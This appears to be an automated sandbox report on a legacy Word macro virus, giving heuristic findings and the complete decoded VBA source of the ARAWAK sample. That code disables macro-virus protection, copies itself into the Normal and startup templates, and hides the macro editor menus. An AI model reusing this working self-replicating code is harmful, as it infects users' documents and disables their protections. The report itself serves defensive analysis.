Verdict: MALICIOUS
Risk Score: 176

Malware Insights

MITRE ATT&CK: T1059.005 Visual Basic
The sample contains legacy WordBasic macro virus markers and VBA macros, including AutoOpen and Auto_Close functions. The script attempts to disable virus protection and export a macro to 'c:\magrip.sys', then imports another script from 'c:\ARAWAK2.sys' to potentially establish persistence by modifying the 'Word81.dot' template. The specific family is not identifiable from the provided evidence.
Heuristics (6)

- VBA macros detected (medium, 4 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code.
- VBA macro-virus self-replication / AV tampering (critical) [OLE_VBA_MACRO_VIRUS_REPLICATION]: VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature. Matched line in script: `Options.VirusProtection = False`
- VBA copies the workbook into the Excel XLSTART startup folder (high) [OLE_VBA_XLSTART_PERSISTENCE]: The macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour. Matched line in script: `ActiveDocument.SaveAs FileName:=Application.StartupPath & "\Word81.dot", FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False`
- AutoOpen macro (low) [OLE_VBA_AUTOOPEN]: AutoOpen macro. Matched line in script: `Sub AutoOpen()`
- Auto_Close macro (low) [OLE_VBA_AUTOCLOSE]: Auto_Close macro. Matched line in script: `Sub AutoClose()`
- Legacy WordBasic macro-virus markers (high) [OLE_LEGACY_WORDBASIC_MACRO_VIRUS]: OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3162 bytes | adcb2db55f32479689af8b00cd21ba4a5351648cc81ad4d70bf3f074fd683e53 |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "ARAWAK"
Sub AutoExec()
On Error Resume Next
Application.VBE.ActiveVBProject.VBComponents.Item("ARAWAK").Export "c:\magrip.sys"
Call Ekeko
If UCase(Dir(Application.StartupPath & "\Word81.dot")) <> "WORD81.DOT" Then
Documents.Add Template:="", NewTemplate:=False
Open "c:\ARAWAK2.sys" For Output As 1
Print #1, "Attribute VB_Name = ""ARAWAK2"""
Print #1, "Sub FileSave()"
Print #1, "On Error Resume Next"
Print #1, "If NormalTemplate.VBProject.VBComponents.Item(""ARAWAK"").Name <> ""ARAWAK"" Then"
Print #1, "NormalTemplate.VBProject.VBComponents.Import ""c:\magrip.sys"""
Print #1, "End If"
Print #1, "ActiveDocument.Save"
Print #1, "End Sub"
Close 1
ActiveDocument.VBProject.VBComponents.Import "c:\ARAWAK2.sys"
ActiveDocument.SaveAs FileName:=Application.StartupPath & "\Word81.dot", FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False
Windows("Word81.dot").Close
End If
End Sub
Sub AutoOpen()
Dim Set1 As Long
On Error Resume Next
Set1 = &H0
Options.VirusProtection = False
System.ProfileString("Options", "EnableMacroVirusProtection") = "0"
Application.VBE.ActiveVBProject.VBComponents.Item("ARAWAK").Export "c:\magrip.sys"
Call Ekeko
End Sub
Sub tutu()
Dim Set1 As Long
Dim WN, WD As Boolean
On Error Resume Next
Set1 = &H0
Options.VirusProtection = False
System.ProfileString("Options", "EnableMacroVirusProtection") = "0"
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
Application.VBE.ActiveVBProject.VBComponents.Item("ARAWAK").Export "c:\magrip.sys"
WD = True
WN = True
If UCase(NormalTemplate.VBProject.VBComponents.Item("ARAWAK").Name) <> "ARAWAK" Then
WN = False
End If
If UCase(ActiveDocument.VBProject.VBComponents.Item("ARAWAK").Name) <> "ARAWAK" Then
WD = False
End If
If WN = False Then
NormalTemplate.VBProject.VBComponents.Import "c:\magrip.sys"
NormalTemplate.Save
End If
If WD = False Then
ActiveDocument.VBProject.VBComponents.Import "c:\magrip.sys"
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
Call Ekeko
End Sub
Sub AutoExit()
On Error Resume Next
Application.VBE.ActiveVBProject.VBComponents.Item("ARAWAK").Export "c:\magrip.sys"
Call tutu
Call AutoExec
End Sub
Sub FileSave()
On Error Resume Next
Application.VBE.ActiveVBProject.VBComponents.Item("ARAWAK").Export "c:\magrip.sys"
Call tutu
Call AutoExec
ActiveDocument.Save
End Sub
Sub AutoClose()
On Error Resume Next
Application.VBE.ActiveVBProject.VBComponents.Item("ARAWAK").Export "c:\magrip.sys"
Call tutu
Call AutoExec
End Sub
Sub Ekeko()
Yin = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
If Yin < 4 Then
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromString "Sub ToolsMacro()" & vbCr & "End Sub" & vbCr & "Sub FileTemplates()" & vbCr & "End Sub" & vbCr & "Sub ViewVBCode()" & vbCr & "End Sub"
End If
End Sub
```